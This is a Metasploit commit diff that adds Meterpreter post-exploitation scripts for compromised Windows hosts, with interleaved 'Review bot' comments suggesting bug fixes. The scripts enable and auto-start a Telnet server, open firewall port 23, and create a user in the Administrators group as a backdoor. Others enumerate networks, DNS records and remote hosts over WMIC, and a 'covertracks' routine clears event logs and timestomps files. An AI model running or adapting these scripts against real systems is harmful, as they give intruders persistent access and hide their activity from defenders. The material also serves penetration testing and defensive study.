New scripts and updated scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
f927320eda
commit
e6ef0ab495
|
@ -0,0 +1,201 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Note: If the Telnet Server is not installed in Vista or win2k8
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows Vista)/
|
||||
if checkifinst(session)
|
||||
print_status("Telnet Service Installed on Target")
|
||||
else
|
||||
print_status("Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
end
|
||||
def usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
|
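Review bot: `insttlntsrv` appends to `tmpout` in its read loop (`tmpout << d` in the pkgmgr branch) but never defines it, so the Vista/2008 install path raises NameError before the channel and process handle are closed; add `tmpout = []` before the `execute` call, or drop the accumulator and just drain the channel since the output is never used. `winver` unpacks `stringtest.scan(/(\d)\.(\d)\.(\d*)/)` with `verout, minor, major = …`, which assigns the first match array to `verout` and nil to the other two, and when the `ver` output does not match at all `verout` is nil and `verout[0]` raises NoMethodError; `verout = stringtest.scan(/(\d)\.(\d)\.(\d*)/).first || []` makes the no-match case explicit, and the same function is duplicated verbatim in the remotewinenum and winenum sections below, so one fix should be applied to all three copies. `checkifinst` returns early without closing the channel or process handle when `TlntSvr` is found, and otherwise returns whatever `r.close` returns rather than an explicit `false`. The usage text still says `getgui` although this is the telnet enabler, and the parse block accepts `-n` (setting an unused `lport`) that `@@exec_opts` does not declare.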
@ -4,7 +4,7 @@ require 'ftools'
|
|||
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Verion: 0.1.2
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
|
@ -15,7 +15,8 @@ require 'ftools'
|
|||
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
|
||||
"-hl" => [ true, "File with Host List for DNS Forward Lookup"],
|
||||
"-d" => [ true, "Domain Name for DNS Forward Lookup"],
|
||||
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"]
|
||||
"-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
|
||||
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
|
||||
|
||||
)
|
||||
session = client
|
||||
|
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
|
|||
def stdlookup(session,domain,dest)
|
||||
dest = dest + "-general-record-lookup.txt"
|
||||
print_status("Getting MX and NS Records for Domain #{domain}")
|
||||
filewrt(dest,"MX and NS Records for Domain #{domain}")
|
||||
filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
|
||||
types = ["SOA","NS","MX"]
|
||||
mxout = []
|
||||
results = []
|
||||
garbage = []
|
||||
types.each do |t|
|
||||
begin
|
||||
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
mxout << d
|
||||
end
|
||||
|
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
|
|||
r.close
|
||||
results = mxout.to_s.split(/\n/)
|
||||
results.each do |rec|
|
||||
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/
|
||||
garbage << rec
|
||||
else
|
||||
print_status("\t#{rec}")
|
||||
filewrt(dest,"#{rec}")
|
||||
end
|
||||
if rec.match(/\s*internet\saddress\s\=\s/)
|
||||
garbage << rec.split(/\s*internet\saddress\s\=/)
|
||||
print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
|
||||
filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
|
||||
garbage.clear
|
||||
end
|
||||
garbage.clear
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
|
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
|
|||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#Function for enumerating srv records
|
||||
def srvreclkp(session,domain,dest)
|
||||
dest = dest + "-srvenum.txt"
|
||||
srout = []
|
||||
garbage = []
|
||||
srvrcd = [
|
||||
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
|
||||
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
|
||||
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
|
||||
print_status("Performing SRV Record Enumeration for #{domain}")
|
||||
filewrt(dest,"SRV Record Enumeration for #{domain}")
|
||||
srvrcd.each do |srv|
|
||||
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
srout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
results = srout.to_s.split(/\n/)
|
||||
results.each do |rec|
|
||||
if rec.match(/\s*internet\saddress\s\=\s/)
|
||||
garbage << rec.split(/\s*internet\saddress\s\=/)
|
||||
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
|
||||
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
|
||||
garbage.clear
|
||||
end
|
||||
garbage.clear
|
||||
srout.clear
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#Function to print message during run
|
||||
def message(dest)
|
||||
print_status "Network Enumerator Meterpreter Script "
|
||||
|
@ -231,10 +269,12 @@ frdlkp = nil
|
|||
dom = nil
|
||||
hostlist = nil
|
||||
helpcall = nil
|
||||
srvrc = nil
|
||||
# Parsing of Options
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
|
||||
when "-sr"
|
||||
srvrc = 1
|
||||
when "-rl"
|
||||
rvrslkp = 1
|
||||
when "-fl"
|
||||
|
@ -249,6 +289,7 @@ helpcall = nil
|
|||
hostlist = val
|
||||
when "-r"
|
||||
range = val
|
||||
|
||||
when "-h"
|
||||
print(
|
||||
"Network Enumerator Meterpreter Script\n" +
|
||||
|
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
|
|||
message(logs)
|
||||
frwdlp(session,hostlist,dom,dest)
|
||||
elsif dom != nil && stdlkp == 1
|
||||
message(logs)
|
||||
stdlookup(session,dom,dest)
|
||||
elsif dom != nil && srvrc == 1
|
||||
message(logs)
|
||||
srvreclkp(session,dom,dest)
|
||||
elsif helpcall == nil
|
||||
print(
|
||||
"Network Enumerator Meterpreter Script\n" +
|
||||
|
|
|
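Review bot: In the new `stdlookup` loop `mxout` is never cleared between `types.each` iterations, so the NS pass re-parses the SOA output and the MX pass re-parses both, printing and writing duplicate records; `srvreclkp` in the later hunk does `srout.clear` at the end of each iteration and `stdlookup` should do the same after the `results.each` block. `results = mxout.to_s.split(/\n/)` there, and `results = srout.to_s.split(/\n/)` in `srvreclkp`, rely on `Array#to_s` joining elements, which holds on Ruby 1.8 but returns the inspect form on 1.9+; `mxout.join.split(/\n/)` is unambiguous on both. `garbage[0]` is the array returned by `rec.split(…)`, so `garbage[0].to_s.sub(" "," ")` renders that array and, as printed here, substitutes a space for a space — presumably a double-space collapse was intended, but verify against real nslookup output before changing it. `stdlookup` opens in the previous hunk and its `rescue ::Exception` is broader than needed; `rescue => e` would report the same command failures without swallowing interrupts.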
@ -0,0 +1,210 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
|
||||
# and Windows XP remote targets using native windows command wmic.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
# Variables for Options
|
||||
helpcall = 0
|
||||
rusr = nil
|
||||
rpass = nil
|
||||
trg = ""
|
||||
# Script Options
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu."],
|
||||
"-t" => [ true, "The target address"],
|
||||
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
|
||||
"-p" => [ true, "Password of user on target system"]
|
||||
)
|
||||
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
||||
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
|
||||
|
||||
# Create the log directory
|
||||
::FileUtils.mkdir_p(logs)
|
||||
|
||||
# WMIC Commands that will be executed on the Target
|
||||
wmic = [
|
||||
'environment list',
|
||||
'share list',
|
||||
'nicconfig list',
|
||||
'computersystem list',
|
||||
'useraccount list',
|
||||
'group list',
|
||||
'sysaccount list',
|
||||
'volume list brief',
|
||||
'service list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'qfe list'
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
||||
# Function for running a list of WMIC commands stored in a array, returs string
|
||||
def wmicexec(session,wmic,user,pass,trgt)
|
||||
print_status("Running WMIC Commands ....")
|
||||
tmpout = ''
|
||||
command = nil
|
||||
runfail = 0
|
||||
runningas = session.sys.config.getuid
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
# Temporary file on windows host to store results
|
||||
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
||||
|
||||
wmic.each do |wmi|
|
||||
if user == nil
|
||||
print_status("The commands will be ran under the credentials of #{runningas}")
|
||||
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
|
||||
else
|
||||
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
|
||||
end
|
||||
print_status "\trunning command wimic #{wmi}"
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
#print_status "\twmic #{command}"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
wmioutfile = session.fs.file.new(wmicfl, "rb")
|
||||
until wmioutfile.eof?
|
||||
tmpout << wmioutfile.read
|
||||
end
|
||||
# Close output file in host
|
||||
wmioutfile.close
|
||||
rescue ::Exception => e
|
||||
print_status("Error running WMIC commands: #{e.class} #{e}")
|
||||
end
|
||||
# We delete the file with the wmic command output.
|
||||
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
|
||||
c.close
|
||||
tmpout
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
def filewrt(file2wrt, data2wrt)
|
||||
output = ::File.open(file2wrt, "a")
|
||||
data2wrt.each do |d|
|
||||
output.puts(d)
|
||||
end
|
||||
output.close
|
||||
end
|
||||
#------------------------------------------------------------------------------
|
||||
# Function to generate report header
|
||||
def headerbuid(session,target,dest)
|
||||
# Header for File that will hold all the output of the commands
|
||||
info = session.sys.config.sysinfo
|
||||
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
|
||||
header << "Running as: #{client.sys.config.getuid}\n"
|
||||
header << "From: #{info['Computer']}\n"
|
||||
header << "OS: #{info['OS']}\n"
|
||||
header << "Target: #{target}\n"
|
||||
header << "\n\n\n"
|
||||
|
||||
print_status("Saving report to #{dest}")
|
||||
header
|
||||
|
||||
end
|
||||
#------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Function Help Message
|
||||
def helpmsg
|
||||
print(
|
||||
"Remote Windows Enumeration Meterpreter Script\n" +
|
||||
"This script will enumerate windows hosts in the target enviroment\n" +
|
||||
"given a username and password or using the credential under witch\n" +
|
||||
"Meterpeter is running using WMI wmic windows native tool.\n" +
|
||||
"Usage:\n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
|
||||
localos = winver(session)
|
||||
|
||||
# Check that the command is not being ran on a Win2k host
|
||||
# since wmic is not present in Windows 2000
|
||||
if localos =~ /(Windows 2000)/
|
||||
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
|
||||
else
|
||||
# Parsing of Options
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
|
||||
when "-t"
|
||||
trg = val
|
||||
when "-u"
|
||||
rusr = val
|
||||
when "-p"
|
||||
rpass = val
|
||||
when "-h"
|
||||
helpmsg
|
||||
helpcall = 1
|
||||
end
|
||||
|
||||
}
|
||||
#logfile name
|
||||
dest = logs + "/" + trg + filenameinfo
|
||||
# Executing main logic of the script
|
||||
if helpcall == 0 and trg != ""
|
||||
|
||||
# Making sure that is running as System a Username and Password for target machine must be provided
|
||||
|
||||
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
|
||||
|
||||
print_status("Stopped: Running as System and no user provided for connecting to target!!")
|
||||
|
||||
else trg != nil && helpcall != 1
|
||||
|
||||
filewrt(dest,headerbuid(session,trg,dest))
|
||||
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
|
||||
|
||||
end
|
||||
elsif helpcall == 0 and trg == ""
|
||||
|
||||
helpmsg
|
||||
end
|
||||
end
|
|
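Review bot: The `else trg != nil && helpcall != 1` line in the main block is an `else` followed by a bare expression, so the condition is evaluated and discarded and the report is written whenever the SYSTEM check above does not fire; it should read `elsif trg != nil && helpcall != 1`, or plain `else` if the extra condition is redundant under the enclosing `if helpcall == 0 and trg != ""`. In `wmicexec` the three `cmd.exe /c echo … >> #{wmicfl}` calls each reassign `r` without closing the previous process handle, so three handles leak per WMIC command; close each one before the next `execute`, and the fixed `sleep` calls are a timing guess rather than a wait on process completion. The `/user:#{user} /password:#{pass}` arguments put the cleartext password on the `wmic` command line, where it is visible in the process list and in process-creation auditing on the host running the script; the header comment should at least state this. `filewrt` calls `data2wrt.each` on the String returned by `wmicexec`, which only works on Ruby 1.8 where `String#each` exists — presumably the runtime at the time, but `each_line` would be portable.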
@ -3,7 +3,7 @@
|
|||
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
|
||||
# and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.3.2
|
||||
#Verion: 0.3.4
|
||||
#Note: Compleatly re-writen to make it modular and better error handling.
|
||||
# Working on adding more Virtual Machine Checks and looking at improving
|
||||
# the code but retain the independance of each module so it is easier for
|
||||
|
@ -33,13 +33,18 @@ commands = [
|
|||
'ipconfig /displaydns',
|
||||
'route print',
|
||||
'net view',
|
||||
'netstat -na',
|
||||
'netstat -nao',
|
||||
'netstat -vb',
|
||||
'netstat -ns',
|
||||
'net accounts',
|
||||
'net accounts /domain',
|
||||
'net session',
|
||||
'net share',
|
||||
'net group',
|
||||
'net user',
|
||||
'net localgroup',
|
||||
'net localgroup administrators',
|
||||
'net group administrators',
|
||||
'net view /domain',
|
||||
'netsh firewall show config',
|
||||
'tasklist /svc'
|
||||
|
@ -62,11 +67,12 @@ cmdstomp = [
|
|||
wmic = [
|
||||
'computersystem list',
|
||||
'useraccount list',
|
||||
'group',
|
||||
'group list',
|
||||
'service list brief',
|
||||
'volume list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'qfe',
|
||||
]
|
||||
#Specific Commands for Windows vista for Wireless Enumeration
|
||||
|
@ -84,6 +90,12 @@ nonwin2kcmd = [
|
|||
'wbem\\wmic.exe',
|
||||
'netsh.exe',
|
||||
]
|
||||
# Executables not pressent in Windows 2000
|
||||
nowin2kexe = [
|
||||
'netsh.exe',
|
||||
'tasklist.exe',
|
||||
'wbem\\wmic.exe',
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
||||
# Function to check if Target Machine a VM
|
||||
|
@ -357,7 +369,7 @@ end
|
|||
def covertracks(session,cmdstomp)
|
||||
clrevtlgs(session)
|
||||
info = session.sys.config.sysinfo
|
||||
trgtos = info['OS']
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows 2000)/
|
||||
chmace(session,cmdstomp - nonwin2kcmd)
|
||||
else
|
||||
|
@ -488,6 +500,36 @@ def killApp(session,procpid)
|
|||
session.sys.process.kill(procpid)
|
||||
print_status("Old process #{procpid} killed.")
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
# Function to execute process migration
|
||||
|
@ -537,7 +579,7 @@ if helpopt != 1
|
|||
header << "Host: #{info['Computer']}\n"
|
||||
header << "OS: #{info['OS']}\n"
|
||||
header << "\n\n\n"
|
||||
trgtos = info['OS']
|
||||
trgtos = winver(session)
|
||||
print_status("Saving report to #{dest}")
|
||||
filewrt(dest,header)
|
||||
filewrt(dest,chkvm(session))
|
||||
|
@ -566,7 +608,11 @@ if helpopt != 1
|
|||
end
|
||||
if (cm != nil)
|
||||
filewrt(dest,"EventLogs where Cleared")
|
||||
covertracks(session,cmdstomp)
|
||||
if trgtos =~ /(Windows 2000)/
|
||||
covertracks(session,cmdstomp - nowin2kexe)
|
||||
else
|
||||
covertracks(session,cmdstomp)
|
||||
end
|
||||
end
|
||||
print_status("Done!")
|
||||
end
|
||||
|
|
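Review bot: `covertracks` now calls `winver(session)` but still fetches `info = session.sys.config.sysinfo`, which in the visible lines is no longer used once `trgtos = info['OS']` is gone, and `winver` spawns a `cmd.exe /c ver` process on every call, so the OS is now probed twice — once in the main block at `trgtos = winver(session)` and again inside `covertracks`; pass the already-computed `trgtos` into `covertracks` or drop the `info` lookup. The main-block hunk subtracts `nowin2kexe` from `cmdstomp` on the Windows 2000 branch before calling `covertracks`, which on its own Windows 2000 branch subtracts `nonwin2kcmd` again before `chmace`; the two lists overlap (`netsh.exe`, `wbem\\wmic.exe`) so the double subtraction is harmless, but one check is redundant, and `nonwin2kcmd` looks like a top-level local rather than a method, so whether it is visible inside `def covertracks` should be confirmed. The `winver` added in this section duplicates the one in the telnet enabler section above, including the `verout, minor, major = stringtest.scan(…)` unpacking that leaves `minor`/`major` nil and raises on a non-matching `ver` string, and should receive the same fix.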